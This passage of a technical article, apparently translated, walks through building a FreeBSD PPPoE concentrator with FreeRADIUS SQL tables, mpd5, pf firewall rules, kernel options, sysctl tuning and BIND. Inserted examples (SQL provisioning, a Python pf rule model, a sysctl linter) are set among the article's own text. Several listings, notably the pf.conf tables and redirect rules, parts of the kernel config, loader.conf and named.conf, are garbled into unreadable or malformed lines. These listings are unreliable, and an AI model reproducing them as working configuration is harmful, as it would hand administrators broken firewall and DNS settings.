ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPVC3ksxLRuHPcknfskNhXxxhtrgfq40904T/wJsrP1lETgQMmjg3kbHDbszeAio/y7au2rORRWSadmQR517dQhBI0qdWF5Zp+SbBfebik7rmJeoTCpESQySH9KM/nBsDx914+UiDogkQziQJtkIIRoux8nZgLc5JJkzcjf00MS7pQ4LzISmDCDJQ75VsG00QZaQ0du40lvngjx8fMvk182rCkhYaMUhbhR1njBvhNSWnfOY51FpO0ocbiOSMGym4pHOEJNWHiQHLtVKY+1D5peA03UM1il7rz1lZkQWLFCaAvJlaEXlasw3ylW7/AzvCVas6uKyutet4GYYSUoD3vVXAbUZ root@valhalla.connectionlost.com.br
Now insert the entries for a working client. These entries control concurrent access, the user and the password (Listing 11).

For CHAP the server needs the clear-text password, so use the Cleartext-Password check attribute; it works for PAP and MS-CHAP as well. The Password (User-Password) check item shown in Listing 11 is deprecated in FreeRADIUS 2.x, which converts it with a warning, so prefer Cleartext-Password for both. Two things to watch if you add sql to the post-auth section so that postauth_query runs: it stores the password the client sent in clear text in radpostauth.pass, and its column names (username, pass, reply, authdate) do not match the radpostauth table in Listing 9 (user, pass, reply, date), so one side has to be renamed first.

Listing 12 covers the dynamic IP pool (Pool-Name), the Garantia row (a bookkeeping value that authorize_reply_query filters out, so it is never sent to the NAS), and the IPv4 address and IPv6 prefix to deliver. If a Framed-IP-Address is present it takes priority and sqlippool leaves the reply alone; without it the address is taken from the pool. Use := (or =) as the operator for reply rows: == is the check-item comparison operator, and rows carrying it are not copied into the Access-Accept.

Here we register the customers' plans: Listing 13.

Here we link the user to the contracted plan: Listing 14.

The addresses registered in our IP pool can be public or private: Listing 15. Before starting the services, replace the sample secrets carried over from the default configuration (the sql password, the proxy secret testing123, the EAP private_key_password and the per-NAS secret) with real ones; the shared secret is what authenticates the PPPoE concentrator to RADIUS. Now start the services and the server is ready to use!

Let's start authenticating clients! =D
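As an added example that is not part of the article, here are the INSERTs that produce data of the shape shown in Listings 11 to 14, followed by the queries dialup.conf runs for that user. It assumes the Listing 9 schema and a MySQL client on the radius database; it uses Cleartext-Password and the := operator instead of the Password / == rows the listings show, and the nas row (address 198.51.100.5, the secret text) is a constructed sample.

```sql
-- Added example (not from the article): provisioning one PPPoE subscriber.
-- Assumes the tables from Listing 9 and the queries from sql/mysql/dialup.conf.
-- NAS address and secret below are constructed samples.

-- The concentrator must be a known client or radiusd silently drops its packets.
-- nas_query reads this table at startup, so restart radiusd after changing it.
INSERT INTO nas (nasname, shortname, type, secret, description)
VALUES ('198.51.100.5', 'valhalla', 'other', 'ChangeMe-LongRandomSecret', 'PPPoE concentrator');

-- Check items: Cleartext-Password serves PAP, CHAP and MS-CHAP alike.
INSERT INTO radcheck (UserName, Attribute, op, Value)
VALUES ('testuser', 'Cleartext-Password', ':=', 'testpass');

-- Reply items use := (or =).  A static Framed-IP-Address row here would take
-- priority over the pool; without one, Pool-Name selects the radippool entries.
INSERT INTO radreply (UserName, Attribute, op, Value)
VALUES ('testuser', 'Pool-Name', ':=', 'main_pool'),
       ('testuser', 'Framed-IPv6-Prefix', ':=', '2001:db8:cafe:cafe::/64');

-- The plan, as in Listing 13: one concurrent session, PPP framing, mpd5 rate limit.
-- mpd-limit uses += so that both the in and the out rule are sent.
INSERT INTO radgroupcheck (GroupName, Attribute, op, Value)
VALUES ('TEST-50MB', 'Simultaneous-Use', ':=', '1');
INSERT INTO radgroupreply (GroupName, Attribute, op, Value)
VALUES ('TEST-50MB', 'Framed-Protocol', ':=', 'PPP'),
       ('TEST-50MB', 'Service-Type', ':=', 'Framed-User'),
       ('TEST-50MB', 'Framed-Compression', ':=', 'Van-Jacobson-TCP-IP'),
       ('TEST-50MB', 'mpd-limit', '+=', 'in#1=all rate-limit 51000000 9562500 19125000'),
       ('TEST-50MB', 'mpd-limit', '+=', 'out#1=all rate-limit 51000000 9562500 19125000');

-- Link the user to the plan; priority orders the groups group_membership_query returns.
INSERT INTO usergroup (UserName, GroupName, priority)
VALUES ('testuser', 'TEST-50MB', 1);

-- What the server sees for an Access-Request from testuser: the dialup.conf
-- queries with %{SQL-User-Name} and %{Sql-Group} filled in.
SELECT id, username, attribute, value, op
  FROM radcheck
 WHERE username = 'testuser'
 ORDER BY id;

SELECT trim(groupname) AS groupname
  FROM usergroup
 WHERE username = 'testuser'
 ORDER BY priority;

SELECT id, trim(groupname) AS groupname, attribute, value, op
  FROM radgroupcheck
 WHERE trim(groupname) = trim('TEST-50MB')
 ORDER BY id;

SELECT id, trim(groupname) AS groupname, attribute, value, op
  FROM radgroupreply
 WHERE trim(groupname) = trim('TEST-50MB') AND attribute <> 'Garantia'
 ORDER BY id;

-- The Simultaneous-Use check is enforced by simul_count_query against radacct,
-- so it only works while accounting is flowing into that table.
SELECT COUNT(*)
  FROM radacct
 WHERE username = 'testuser'
   AND acctstoptime IS NULL;
```

Run the four SELECTs after every change to a plan: they are exactly what radiusd -X will show it executing, and a row that does not come back here will not reach the concentrator either.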

Now we will build the PPPoE concentrator.

Start from a machine with a fresh FreeBSD install. We will not cover the installation itself; a generic one is fine, but leave room in /var for the logs.

Edit rc.conf with the settings and the daemons to start at boot (Listing 16).

A tip: if you see very high CPU consumption and instability, disable tso, lro, rxcsum and txcsum on the interfaces. The impact on performance and quality is small, but it considerably reduces the processing load (Listing 17).

We will install the necessary packages:

Install mpd5 on your FreeBSD:


[Figure: mpd5 web interface, "Multi-link PPP Daemon for FreeBSD", current status summary]


# cd /usr/ports/net/mpd5 


# make install clean 
Install freeradius-client: 


# cd /usr/ports/net/freeradius-client 


# make install clean 
Install bind: 


# cd /usr/ports/dns/bind910 


# make install clean 
Install the MySQL client:


# cd /usr/ports/databases/mysql56-client 


# make install clean 
Install postfix: 


# cd /usr/ports/mail/postfix 


# make install clean 
Install nginx: 


# cd /usr/ports/www/nginx 


# make install clean 


[Figure: mpd5 web interface status table with the columns Bund, Iface, IPCP, IPV6CP, CCP, ECP, Link, LCP, User, Device, Peer]

Figure 4. NetFlow data: traffic results
Listing 11.

mysql> use radius
Database changed

mysql> select * from radcheck where username='testuser';
+-----+----------+------------------+----+----------+-----------+
| id  | UserName | Attribute        | op | Value    | Bloqueado |
+-----+----------+------------------+----+----------+-----------+
| 854 | TESTUSER | Password         | == | testpass |         0 |
| 855 | TESTUSER | Simultaneous-Use | := | 1        |         0 |
+-----+----------+------------------+----+----------+-----------+
2 rows in set (0.00 sec)

Listing 12.

mysql> select * from radreply where username='testuser';
+-----+----------+--------------------+----+-------------------------+
| id  | UserName | Attribute          | op | Value                   |
+-----+----------+--------------------+----+-------------------------+
| 266 | TESTUSER | Pool-Name          | := | main_pool               |
| 267 | TESTUSER | Garantia           | == | 20                      |
| 270 | TESTUSER | Framed-IP-Address  | == | 203.0.113.69            |
| 271 | TESTUSER | Framed-IPv6-Prefix | == | 2001:db8:cafe:cafe::/64 |
+-----+----------+--------------------+----+-------------------------+
4 rows in set (0.00 sec)

Listing 13.

mysql> select * from radgroupcheck where trim(groupname)='TEST-50MB';
+-----+-----------+------------------+----+-------+
| id  | GroupName | Attribute        | op | Value |
+-----+-----------+------------------+----+-------+
| 249 | TEST-50MB | Simultaneous-Use | := | 1     |
+-----+-----------+------------------+----+-------+
1 row in set (0.00 sec)

mysql> select * from radgroupreply where trim(groupname)='TEST-50MB';
+-----+-----------+--------------------+----+-------------------------------------------------+
| id  | GroupName | Attribute          | op | Value                                           |
+-----+-----------+--------------------+----+-------------------------------------------------+
| 472 | TEST-50MB | Framed-Protocol    | := | PPP                                             |
| 473 | TEST-50MB | Service-Type       | := | Framed-User                                     |
| 474 | TEST-50MB | Framed-Compression | := | Van-Jacobson-TCP-IP                             |
| 475 | TEST-50MB | mpd-limit          | += | in#1=all rate-limit 51000000 9562500 19125000   |
| 476 | TEST-50MB | mpd-limit          | += | out#1=all rate-limit 51000000 9562500 19125000  |
+-----+-----------+--------------------+----+-------------------------------------------------+
5 rows in set (0.00 sec)

Listing 14.

mysql> select * from usergroup where username='testuser';
+----------+-----------+----------+
| UserName | GroupName | priority |
+----------+-----------+----------+
| TESTUSER | TEST-50MB |        1 |
+----------+-----------+----------+
1 row in set (0.00 sec)

Listing 15.

mysql> select * from radippool limit 3;
+----+-----------+-----------------+--------------+-----------------+------------------+-------------+----------+----------+
| id | pool_name | framedipaddress | nasipaddress | calledstationid | callingstationid | expiry_time | username | pool_key |
+----+-----------+-----------------+--------------+-----------------+------------------+-------------+----------+----------+
|  1 | main_pool | 203.0.113.26    |              |                 | NULL             | NULL        |          | 0        |
|  2 | main_pool | 203.0.113.27    |              |                 | NULL             | NULL        |          | 0        |
|  3 | main_pool | 203.0.113.28    |              |                 | NULL             | NULL        |          | 0        |
+----+-----------+-----------------+--------------+-----------------+------------------+-------------+----------+----------+
3 rows in set (0.00 sec)


Listing 16.

# cat /etc/rc.conf
hostname="valhalla.connectionlost.com.br"
ifconfig_igb4="inet 203.0.113.5 netmask 255.255.255.0"
ifconfig_igb4_alias0="inet 198.51.100.5 netmask 255.255.255.0"
ifconfig_igb3="inet 192.0.2.3 netmask 255.255.255.0"
#ifconfig_igb2="up"
#ifconfig_igb1="up"
#ifconfig_igb0="up"
defaultrouter="203.0.113.1"
gateway_enable="YES"
ipv6_activate_all_interfaces="YES"
ipv6_defaultrouter="2001:db8::1"
ifconfig_igb4_ipv6="inet6 2001:db8::5 prefixlen 32"
ipv6_gateway_enable="YES"
pf_enable="YES"
pf_rules="/etc/pf.conf"
pf_flags=""
pf_device="/dev/pf"
pflog_enable="YES"                  # start pflogd(8)
pflog_flags=""                      # additional flags for pflogd startup
pflog_logfile="/var/log/pflog"      # where pflogd should store the logfile
dumpdev="AUTO"
ntpd_enable="YES"
bsnmpd_enable="YES"
quagga_enable="YES"
quagga_flags="-d"
quagga_daemons="zebra ospfd ospf6d"
watchquagga_enable="YES"
watchquagga_flags="-dz -R '/usr/local/etc/rc.d/quagga restart' zebra ospfd ospf6d"
mpd_enable="YES"
mpd_flags="-b -s mpd5"
named_enable="YES"
postfix_enable="YES"
sendmail_enable="NO"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"
daily_clean_hoststat_enable="NO"
daily_status_mail_rejects_enable="NO"
daily_status_include_submit_mailq="NO"
daily_submit_queuerun="NO"
nginx_enable="YES"
fcgiwrap_enable="YES"
fcgiwrap_user="www"
fcgiwrap_socket="unix:/var/run/fcgiwrap/fcgiwrap.sock"
sshd_enable="YES"
#eof


Listing 17.

ifconfig_igb4="inet 203.0.113.5 netmask 255.255.255.0 -tso -lro -rxcsum -txcsum"
ifconfig_igb4_alias0="inet 198.51.100.5 netmask 255.255.255.0"
ifconfig_igb3="inet 192.0.2.3 netmask 255.255.255.0 -tso -lro -rxcsum -txcsum"
#ifconfig_igb2="up -tso -lro -rxcsum -txcsum"
Listing 18. 

edit /etc/pf.conf: 

ext 1f="igb4” 

ext ip="203.0.113.5” 

exe teo=— 200T dae e2 5” 
extol wad= ie. oi Ls © 


PVG Eh= Egos 

iM p= 92.02.” 

int mét="192.0.2.0/ 247 

Dt WROddedse= ZO jc Oo Ic oo Zoe © 


set limit states 10000000 

set limit table-entries 1000000 
set limit srce-nodes 1000000 

set limit frags 1000000 


set skip on 1o0 
set skip on lol 


set loginterface igb0 


Seite aha) eh 


# tables to run the start scripts from mpdd 
table <PRIVADOS> persist 

table <PUBLICOS> persist 

table <PUBLICOS6> persist 

table <BLOQUEADOS> persist 

table <BLOQUEADOS6> persist 


# table to release access to private ips to the net- 
Work, EYolcalily sed LO SuppOrE 

Table =<GOD> | 203.0 see o 

# table used to create a specific user for infrastructure 
and/or support, without internet access, just access 
to the lan or address released in IPSINFRA table 
(only create a PPPoE user that receives the address 
of the table INFRA) 

table <INFRA> { 203.0.113.70 } 

table <IPSINFRA> { 192.0.2.0/24 } 

# table used for addresses that blocked customer may 
have access to, usually ip PPPoE concentrator and 
your web server to create a block page and access for 
future payment 

palbiley <NONBROCK> {IZ 7-080 1 205 20R ios 203 0 Pisa 

Eainlke  <NONBIOCKCG> {e: ZOO dibs 4 

# table with routers and PPPok concentrators 

Gable. <ROULERS> 4202.0. 113. 205-0. 1 5} 

table <ROUIBRSo> 4 2Z00l dbs] 200M-sdbs- <5 } 

# table of monitoring servers, usually Zabbix for checks and Cacti for
# collecting the servers' SNMP data

table <MONITORAMENTO> {203.0.113.10} 

table <MONITORAMENTO6> { 2001:db8::10 } 

# table of who is authorized to query this recursive DNS

Table <DNS> (2740202 203 202 tis 0/247 193 oie N00. 07 247 19 
23022.07 24} 

table <DNSc> 4-317 2804264053732) 

# table with the IPs of the RADIUS servers

Gabiles<RADIUS> {198 zo 10022} 

# table released to the support system

Gable <SUPORUE> 205. 0 ila 6o) 

# table of local IPs on the PPPoE concentrator

Pablo hOChi > {( A0s. Oils oye oO eyo 0 2 

take: <LOCAWo> (2001 dba: 5 1} 

# table released to the support system and the mpd5 web interface

table <SYSADMIN> {203.0.113.69} 

table <SYSADMIN6> {2804:c40::cafe} 

# table of internally connected IPs


table <CONNECIE D> = {os ol 00ers, bo 2 0222S 


nat on $ext_if from <PRIVADOS> to any -> $ext_ip
nat on $ext_if from <GOD> to any -> $ext_ip
no rdr proto tcp from <BLOQUEADOS> to <NONBLOCK>
rdr pass proto tcp from <BLOQUEADOS> to !<NONBLOCK> port (Vena alk naa (0}ce|
rdr proto tcp from <BLOQUEADOS6> to !<NONBLOCK6> port 80 BP aerial
rdr pass proto tcp from <BLOQUEADOS> to !<NONBLOCK> port Ae 12 O00 oor 30
rdr proto tcp from <BLOQUEADOS6> to !<NONBLOCK6> port LAS =>) pork “80

block in log quick from any to $int_broadcast
block quick log from <BLOQUEADOS> to !<NONBLOCK>
block quick log inet6 from <BLOQUEADOS6> to !<NONBLOCK6>
pass quick log proto {tcp,udp} from <BLOQUEADOS> to <ROUTERS> port 53
pass quick log inet6 proto {tcp,udp} from <BLOQUEADOS6> to <ROUTERS6> port 53
block in quick log from <PRIVADOS> to <PRIVADOS>
block in quick log from <PUBLICOS> to <PRIVADOS>
block in quick log from <PUBLICOS6> to <PRIVADOS>
block in quick log from <INFRA> to !<IPSINFRA>
block in quick log proto {tcp,udp} from !<ROUTERS> to any port {199,2601,2604,2606}
block quick inet6 proto {tcp,udp} from !<ROUTERS6> to any port {199,2601,2604,2606}
block quick log proto {tcp,udp} from !<MONITORAMENTO> to any port {161}
block quick inet6 proto {tcp,udp} from !<MONITORAMENTO6> to any port {161}
block quick log proto {tcp,udp} from !<DNS> to <LOCAL> port 53
block quick log inet6 proto {tcp,udp} from !<DNS6> to <LOCAL6> port 53
block quick log from <PRIVADOS> to <CONNECTED>
block quick log from <PUBLICOS> to <CONNECTED>
block quick log on $ext_if proto {tcp,udp} from !<SYSADMIN> to $ext_ip port 5006
block quick log on $ext_if proto {tcp,udp} from !<SYSADMIN> to <LOCAL> port 5006
block quick log on $ext_if proto {tcp,udp} from !<SYSADMIN> to <LOCAL> port {80,666}
block quick log on $ext_if proto {tcp,udp} from !<SUPORTE> to <LOCAL> port {80,666}
block quick log on $ext_if inet6 proto {tcp,udp} from !<SYSADMIN6> to $ext_ip6 port {80,666}
block quick log on $ext_if inet6 proto {tcp,udp} from !<SYSADMIN6> to $ext_ip6 port 5006
pass all
#eof


Listing 19.

# vi /root/kernels/valhalla
# netgraph options
options HZ=4000
options NETGRAPH
options NETGRAPH_PPPOE
options NETGRAPH_SOCKET
options NETGRAPH_CISCO
options NETGRAPH_ECHO
options NETGRAPH_FRAME_RELAY
options NETGRAPH_HOLE
options NETGRAPH_KSOCKET
options NETGRAPH_LMI
options NETGRAPH_RFC1490
options NETGRAPH_TTY
oyere oyoys! MEME IVA IL INS VINEE
options NETGRAPH_BPF
options NETGRAPH_ETHER
options NETGRAPH_IFACE
options NETCRAPH VEZ TE
options NETGRAPH_MPPC_ENCRYPTION
options NETGRAPH_PPP
options NETGRAPH_PPTPGRE
options NETGRAPH_TEE
options NETGRAPH_UI
options NETGRAPH_VJC
options NETGRAPH_CAR
options NETGRAPH_NETFLOW
options ALTQ
options ALTQ_CBQ
options ALTQ_RED
options ALTQ_RIO
options ALTQ_HFSC
options ALTQ_PRIQ
options ALTQ_NOPCC
device pf
device pflog
device pfsync
options ROUTETABLES=3
options SC_NORM_ATTR=(FG_GREEN|BG_BLACK)
options SC_KERNEL_CONS_ATTR=(FG_YELLOW|BG_BLACK)
options SC_HISTORY_SIZE=8192
#eof


# make buildkernel KERNCONF=valhalla
# make installkernel KERNCONF=valhalla
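Rule order matters in the pf.conf above because every filter rule carries quick: pf stops at the first matching quick rule, and the trailing pass all only applies when nothing matched. In the listing the line block quick log from <BLOQUEADOS> to !<NONBLOCK> comes before pass quick log proto {tcp,udp} from <BLOQUEADOS> to <ROUTERS> port 53, so a blocked customer's DNS query only gets through to a router that is also listed in <NONBLOCK>. The following is an added example, not code from the article: a small Python model of that first-match evaluation with constructed table contents (documentation addresses), ignoring rdr translation and state, that compares the article's order with the DNS exception moved first.

```python
#!/usr/bin/env python3
"""Toy first-match evaluator for the 'quick' filter rules of a pf ruleset.

Added example, not the article's code. It models only what is needed to see how
rule order interacts with 'quick': every rule here is quick, so the first matching
rule decides, and the trailing 'pass all' is the default. Table contents are
constructed (documentation addresses), not the article's real ones; rdr and state
are not modelled.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed table contents (in the article these are filled by the mpd5 scripts).
TABLES: Dict[str, List[str]] = {
    "BLOQUEADOS": ["10.0.0.9"],                 # a blocked customer
    "NONBLOCK": ["203.0.113.5"],                # concentrator / block-page web server
    "ROUTERS": ["203.0.113.1", "203.0.113.5"],  # routers and concentrators
    "LOCAL": ["203.0.113.5"],                   # local addresses of the concentrator
    "DNS": ["10.0.0.0/8", "203.0.113.0/24"],    # who may query the recursive resolver
}


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str   # "tcp" or "udp"
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str                        # "block" or "pass"
    src: str = "any"                   # table name, "!table" or "any"
    dst: str = "any"
    protos: Optional[frozenset] = None  # None = any protocol
    dport: Optional[int] = None         # None = any port


def in_table(ip: str, name: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(e, strict=False) for e in TABLES[name])


def _addr_match(spec: str, ip: str) -> bool:
    if spec == "any":
        return True
    if spec.startswith("!"):
        return not in_table(ip, spec[1:])
    return in_table(ip, spec)


def matches(rule: Rule, pkt: Packet) -> bool:
    return (_addr_match(rule.src, pkt.src)
            and _addr_match(rule.dst, pkt.dst)
            and (rule.protos is None or pkt.proto in rule.protos)
            and (rule.dport is None or rule.dport == pkt.dport))


def decide(rules: List[Rule], pkt: Packet) -> str:
    """All rules are 'quick': the first match wins; 'pass all' at the end is the default."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action
    return "pass"


TCPUDP = frozenset({"tcp", "udp"})

# The three relevant rules in the order the article's pf.conf lists them.
ARTICLE_ORDER = [
    Rule("block", src="BLOQUEADOS", dst="!NONBLOCK"),
    Rule("pass", src="BLOQUEADOS", dst="ROUTERS", protos=TCPUDP, dport=53),
    Rule("block", src="!DNS", dst="LOCAL", protos=TCPUDP, dport=53),
]

# The same rules with the DNS exception placed before the walled-garden block.
DNS_FIRST = [ARTICLE_ORDER[1], ARTICLE_ORDER[0], ARTICLE_ORDER[2]]


if __name__ == "__main__":
    dns_to_other_router = Packet("10.0.0.9", "203.0.113.1", "udp", 53)
    dns_to_concentrator = Packet("10.0.0.9", "203.0.113.5", "udp", 53)
    web_to_anywhere = Packet("10.0.0.9", "198.51.100.20", "tcp", 80)
    for name, rules in (("article order", ARTICLE_ORDER), ("dns first", DNS_FIRST)):
        print(name,
              "dns->other router:", decide(rules, dns_to_other_router),
              "dns->concentrator:", decide(rules, dns_to_concentrator),
              "web->anywhere:", decide(rules, web_to_anywhere))
```

With the article's order a blocked customer reaches DNS only on the concentrator itself (it is in <NONBLOCK>, so the block rule does not match); with the DNS exception first, any router in <ROUTERS> answers. Web traffic from a blocked customer is shown as blocked here only because the rdr to the block page is not modelled: in pf the redirect rewrites the destination before the filter rules run.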


Listing 20.

# vi /etc/sysctl.conf
kern.ipc.maxsockbuf=157286400
net.inet.tcp.sendbuf_max=157286400
net.inet.tcp.recvbuf_max=157286400
kern.ipc.nmbclusters=2097152
net.inet.tcp.cc.algorithm=htcp
net.inet.tcp.cc.htcp.adaptive_backoff=1
net.inet.tcp.cc.htcp.rtt_scaling=1
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1
net.inet.ip.portrange.first=1024
net.inet.ip.portrange.hifirst=1024
net.inet.ip.portrange.last=65535
kern.ipc.soacceptqueue=65535
kern.ipc.somaxconn=65535
net.inet.tcp.mssdflt=1460
net.inet.tcp.minmss=1300
net.inet.tcp.rfc1323=1
net.inet.tcp.rfc3390=1
net.inet.tcp.sack.enable=1
net.inet.tcp.tso=0
net.inet.tcp.nolocaltimewait=1
net.inet.tcp.syncache.rexmtlimit=0
net.inet.tcp.msl=5000
net.inet.ip.rtexpire=2
net.inet.ip.rtminexpire=2
net.inet.tcp.syncookies=0
dev.igb.0.fc=0
dev.igb.1.fc=0
dev.igb.2.fc=0
dev.igb.3.fc=0
dev.igb.4.fc=0
dev.igb.5.fc=0
dev.igb.6.fc=0
dev.igb.7.fc=0
net.inet.ip.check_interface=1
net.inet.ip.process_options=0
net.inet.ip.redirect=0
net.inet.ip.stealth=1
net.inet.icmp.drop_redirect=1
net.inet.tcp.drop_synfin=1
net.inet.tcp.fast_finwait2_recycle=1
net.inet.tcp.icmp_may_rst=0
net.inet.tcp.msl=5000
net.inet.tcp.path_mtu_discovery=0
net.inet.udp.blackhole=1
net.inet.tcp.blackhole=2
security.bsd.see_other_uids=0
net.inet.tcp.ecn.enable=1
net.inet.tcp.maxtcptw=15000
net.inet.icmp.icmplim=0
net.inet.tcp.sendspace=262144
net.inet.tcp.recvspace=262144
net.inet.udp.recvspace=16772216
net.inet.udp.maxdgram=57344
net.inet.tcp.sendbuf_inc=32768
net.inet.tcp.recvbuf_inc=65536
net.inet.tcp.hostcache.expire=3900
net.inet.tcp.delayed_ack=1
net.inet.tcp.delacktime=50
kern.sched.interact=30
kern.sched.slice=12
net.local.stream.sendspace=164240
net.local.stream.recvspace=164240
kern.random.sys.harvest.ethernet=0
kern.random.sys.harvest.interrupt=0
kern.random.sys.harvest.point_to_point=0
kern.random.sys.harvest.swi=0
kern.ipc.maxsockets=524288
net.inet.raw.maxdgram=16384
net.inet.raw.recvspace=16384
net.inet6.icmp6.nodeinfo=0
net.inet6.ip6.use_tempaddr=1
net.inet6.ip6.prefer_tempaddr=1
net.inet6.icmp6.rediraccept=1
net.inet6.ip6.accept_rtadv=1
##net.inet6.ip6.auto_linklocal=0
kern.ipc.shmmax=2147483648
kern.ipc.shmall=2097152
kern.maxvnodes=100000000
lays Light ie Vsveoraiil seloiiatcisiloron Lely 2101010) 4
net.graph.maxdgram=16772216
net.graph.recvspace=16772216
net.inet.tcp.blackhole=2
net.inet.udp.blackhole=1
net.inet.tcp.drop_synfin=1
net.inet.tcp.syncookies=1
net.inet.icmp.drop_redirect=1
net.inet.icmp.log_redirect=0
net.inet.ip.redirect=0
#eof

# vi /boot/loader.conf
kern.maxusers=1024
net.graph.maxdata=65536
net.graph.maxalloc=65536
kern.ipc.maxpipekva=620000000
net.inet.tcp.syncache.hashsize=1024
net.inet.tcp.syncache.bucketlimit=512
net.inet.tcp.syncache.cachelimit=65536
net.inet.tcp.hostcache.hashsize="16384"
net.inet.tcp.hostcache.bucketlimit="100"
coretemp_load="YES"
Eesnvep eload=" (ha
bE Lge eload= “Vio
loader_logo="beastie"
net.link.ifqmaxlen="1024"
hw.igb.txd="4096"
hw.igb.rxd="4096"
hve GiaexeOEuecess eit b= 1”
hw.igb.enable_aim="1"
hw.igb.max_interrupt_rate="32000"
hw.igb.num_queues="0"
hw.igb.enable_msix="1"
kern.ipc.nmbclusters="2097152"
kern.ipc.nmbufs="6434970"
kern.ipc.nmbjumbop="935356"
net.inet.tcp.tcbhashsize="65536"
net.isr.bindthreads="0"
net.isr.defaultqlimit="4096"
net.isr.maxthreads=7
kern.ipc.maxsockets=524288
#eof
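The sysctl.conf in Listing 20 sets several keys twice (net.inet.tcp.msl, net.inet.tcp.syncookies, both blackholes, net.inet.tcp.drop_synfin). sysctl(8) applies the file top to bottom, so the last line wins: syncookies ends up at 1 even though the earlier line set it to 0, which is easy to miss in a file this long. The following is an added example, not code from the article: a small Python checker that parses a sysctl.conf, reports keys assigned more than once with differing values, and compares the effective values against a short hardening baseline. The sample file text and the baseline are constructed for the example.

```python
#!/usr/bin/env python3
"""Lint a FreeBSD sysctl.conf: conflicting duplicate keys and a hardening baseline.

Added example; SAMPLE and BASELINE below are constructed for this illustration,
not taken from the article.
"""
import re
from typing import Dict, List, Tuple

# Values a practitioner would expect on an exposed router / PPPoE concentrator.
# Constructed baseline; adjust to local policy.
BASELINE: Dict[str, str] = {
    "net.inet.ip.redirect": "0",
    "net.inet.icmp.drop_redirect": "1",
    "net.inet.tcp.drop_synfin": "1",
    "net.inet.tcp.blackhole": "2",
    "net.inet.udp.blackhole": "1",
    "net.inet.tcp.syncookies": "1",
    "security.bsd.see_other_uids": "0",
}

# Constructed sample in the same shape as the article's listing (abridged).
SAMPLE = """\
net.inet.ip.forwarding=1
net.inet.tcp.msl=5000
net.inet.tcp.syncookies=0
net.inet.ip.redirect=0
net.inet.tcp.msl=5000
net.inet.udp.blackhole=1
net.inet.tcp.blackhole=2
security.bsd.see_other_uids=0
# a comment line is ignored
net.inet.tcp.syncookies=1
net.inet.tcp.drop_synfin=1
"""

_ASSIGN = re.compile(r"^\s*([A-Za-z0-9_.\-]+)\s*=\s*(.*?)\s*$")


def parse_sysctl_conf(text: str) -> List[Tuple[str, str]]:
    """(key, value) pairs in file order; blanks and '#' comments skipped,
    quotes around values (loader.conf style) stripped."""
    pairs: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = _ASSIGN.match(line)
        if m:
            pairs.append((m.group(1), m.group(2).strip('"')))
    return pairs


def effective_values(pairs: List[Tuple[str, str]]) -> Dict[str, str]:
    """sysctl(8) applies lines top to bottom, so the last assignment wins."""
    eff: Dict[str, str] = {}
    for key, value in pairs:
        eff[key] = value
    return eff


def conflicting_duplicates(pairs: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Keys assigned more than once with different values, values in file order."""
    seen: Dict[str, List[str]] = {}
    for key, value in pairs:
        seen.setdefault(key, []).append(value)
    return {k: vs for k, vs in seen.items() if len(set(vs)) > 1}


def baseline_violations(eff: Dict[str, str], baseline: Dict[str, str] = BASELINE):
    """Baseline keys whose effective value differs, or which are unset (None)."""
    return {k: eff.get(k) for k, want in baseline.items() if eff.get(k) != want}


def lint(text: str) -> dict:
    pairs = parse_sysctl_conf(text)
    eff = effective_values(pairs)
    return {
        "conflicts": conflicting_duplicates(pairs),
        "violations": baseline_violations(eff),
        "effective": eff,
    }


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    report = lint(text)
    for key, values in report["conflicts"].items():
        print(f"CONFLICT {key}: {' -> '.join(values)} (effective {report['effective'][key]})")
    for key, value in report["violations"].items():
        print(f"BASELINE {key}: got {value!r}")
```

Run it as `python3 sysctl_lint.py /etc/sysctl.conf`; on the constructed sample it reports the syncookies conflict (0 then 1, effective 1) and that net.inet.icmp.drop_redirect is unset. A key repeated with the same value, like msl, is not a conflict.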
Install fcgiwrap:

# cd /usr/ports/www/fcgiwrap
# make install clean

Install quagga:

# cd /usr/ports/net/quagga
# make install clean

Install log.io:

# cd /usr/ports/www/npm
# make install clean
# ln -s /usr/local/bin/python2.7 /usr/local/bin/python
# ln -s /usr/bin/clang++ /usr/bin/g++
# npm config set python /usr/local/bin/python2.7
# npm install -g node-gyp
# npm install -g log.io --user 'root'

Install sudo:

# cd /usr/ports/security/sudo
# make install clean

Install radvd:


Listing 21.

# vi /etc/resolv.conf
nameserver 127.0.0.1

# vi /usr/local/etc/namedb/named.conf
acl trusted {
	127.0.0.1;
	F060. ise 0724.
	IORI Oya
	PACNGUL stolleress 3 // iz 6
};

options {
	// All file and path names are relative to the chroot directory,
	// if any, and should be fully qualified.
	directory "/usr/local/etc/namedb/working";
	pid-file "/var/run/named/pid";
	dump-file "/var/dump/named_dump.db";
	statistics-file "/var/stats/named.stats";
	allow-query { trusted; };
	allow-recursion { trusted; };
	licjccen=-One {sly 0s On i 200. oe
	ITeren-on—v 6 ie alles IOI ology ese a
	disable-empty-zone "255.255.255.255.IN-ADDR.ARPA";
	disable-empty-zone "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA";
	disable-empty-zone "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA";
};

logging {
	channel systemlog {
		file "/var/log/named.log";
		severity debug;
		print-time yes;
	};
	channel auditlog {
		file "/var/log/security.log";
		severity debug;
		print-time yes;
	};
	channel xferlog {
		file "/var/log/xfer.log";
		severity debug;
		print-time yes;
	};
	category default { systemlog; };
	category security { auditlog; systemlog; };
	category config { systemlog; };
	category xfer-in { xferlog; };
	category xfer-out { xferlog; };
	category notify { systemlog; };
	category update { auditlog; };
	category queries { auditlog; };
	category lame-servers { auditlog; };
};

zone "." { type hint; file "/usr/local/etc/namedb/named.root"; };

